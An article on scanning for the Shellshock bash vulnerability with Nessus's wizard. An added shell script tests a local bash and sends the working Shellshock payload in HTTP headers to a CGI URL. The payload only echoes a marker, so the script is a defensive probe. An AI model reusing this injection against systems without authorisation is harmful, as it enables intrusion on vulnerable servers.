Shellshock Vulnerability Scanning – Nessus
Nessus is one of the most widely used vulnerability scanners; it scans IT infrastructure to find possible vulnerabilities in the network. Nessus can also be integrated with Nmap and Metasploit, and the combination gives a fine toolset that performs vulnerability scanning plus exploitation: a complete penetration-testing environment. OpenVAS is the competitor of Nessus, and both tools have their own merits and demerits, but for now the objective is to secure Unix/Mac operating systems against "Shellshock".
What Is ShellShock Bug ?
ShellShock is a vulnerability whose reach is arguably greater than that of the Heartbleed bug; it affects Linux and Mac OS X systems. Dubbed Shellshock, or the Bash Bug, the security vulnerability is officially known as CVE-2014-6271 and affects the Bash command processor, which ships with most Linux distributions and with Apple's Mac OS X, and which is also reachable through software such as the Apache web server whenever request data is handed to Bash (for example by CGI scripts).
Users running Linux and Mac OS X on their PCs are at risk, but the most likely targets are thought to be web servers running the Apache web server software.
How to scan for the "shellshock" vulnerability ?
ShellShock is a bug in bash, but it can be exploited remotely in a number of ways (via HTTP or other means). Tenable has released a handful of plugins: patch checks, a direct test of the vulnerability over SSH in an authenticated scan, and a test for the vulnerability via HTTP(S). To speed up the audit, Tenable has also released a wizard for this.
To use it, update your plugin feed (make sure you're running plugin set 201409251325 or newer). Then go to Policies -> Create a new policy, and you'll notice the new Shellshock wizard:
Click on it and follow the instructions. You'll have the option to enter your SSH credentials, but you can just as well run a fully unauthenticated scan that targets only HTTP. Once this is set, create a new scan that uses this policy. Hopefully, you will not see output such as:
What does this wizard do?
This wizard creates a very narrow scan policy that performs a quick port scan (or a slower one, if you ask for a "thorough" scan) to identify the remote HTTP and SSH servers. Then it will:
- Log into every host (if you provided credentials) and make sure that the vendor-supplied patches are installed;
- For good measure, use the opportunity of being logged in to check bash itself directly (by testing whether a function definition passed in an environment variable executes the command appended after it), so that if your vendor did not provide patches, or if you're scanning an unsupported system, Nessus will still catch the flaw;
- If a web server is running, crawl it while setting a malformed User-Agent, Cookie and Referer header to try to exploit the vulnerability through this attack vector (CGI scripts receive request headers from the web server as environment variables, so a header shaped like a function definition reaches bash the same way).
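The two checks the wizard performs, the direct test of bash over a login and the HTTP probe through crafted headers, can be reproduced by hand. The script below is an added example and is not Tenable's plugin code; the function names, the canary string and the curl invocation are this example's own choices. check_bash runs the well-known CVE-2014-6271 test locally (it is safe to run: the only command a vulnerable bash would execute is an echo), while probe_url sends the same payload in the User-Agent, Cookie and Referer headers and needs network access and permission to test the target, so it is not exercised here.

```shell
#!/bin/sh
# Added example: reproduce the Shellshock (CVE-2014-6271) checks described above.
# Not part of Nessus or Tenable's plugins; names and canary string are assumptions.

# Marker that only shows up if the command appended to the function definition runs.
CANARY="shellshock_canary_marker"

# Decide from captured output whether the appended command executed.
# Prints a verdict and returns 0 when vulnerable, 1 otherwise.
classify_output() {
    case "$1" in
        *"$CANARY"*) echo "VULNERABLE"; return 0 ;;
        *)           echo "not vulnerable"; return 1 ;;
    esac
}

# Direct check of a bash binary (default: the bash on PATH): export an environment
# variable whose value is a function definition "() { :;}" followed by a trailing
# command. A vulnerable bash executes the trailing command while importing the
# function; a patched bash ignores it (and warns on stderr, which we discard).
check_bash() {
    bash_bin="${1:-bash}"
    out=$(env "x=() { :;}; echo $CANARY" "$bash_bin" -c "echo probe" 2>/dev/null)
    classify_output "$out"
}

# Header value for the HTTP vector. A CGI script that runs bash inherits request
# headers as HTTP_USER_AGENT, HTTP_COOKIE and HTTP_REFERER, so the same function
# definition triggers the bug. The Content-Type line and blank line form a valid
# CGI response so the web server returns the canary in the body instead of a 500.
http_payload() {
    printf '() { :;}; echo Content-Type: text/plain; echo; echo %s' "$CANARY"
}

# Send the probe to one URL (e.g. http://host/cgi-bin/status) in all three headers
# Nessus uses and classify the response body. Requires network access and
# authorisation to test the target; not run by the checks below.
probe_url() {
    url="$1"
    payload=$(http_payload)
    out=$(curl -s -m 10 \
              -H "User-Agent: $payload" \
              -H "Cookie: $payload" \
              -H "Referer: $payload" \
              "$url" 2>/dev/null)
    classify_output "$out"
}

# Stand-alone usage: check the local bash, then optionally probe a URL given as $1.
if [ "${0##*/}" = "shellshock_check.sh" ]; then
    check_bash
    [ -n "$1" ] && probe_url "$1"
fi
```

classify_output is kept separate from the two probes so the same verdict logic applies to output captured from a local bash, an SSH session or an HTTP response body; whatever transport delivers the function definition, the evidence of exploitation is the canary appearing in output where only "probe" or the CGI script's normal page should be.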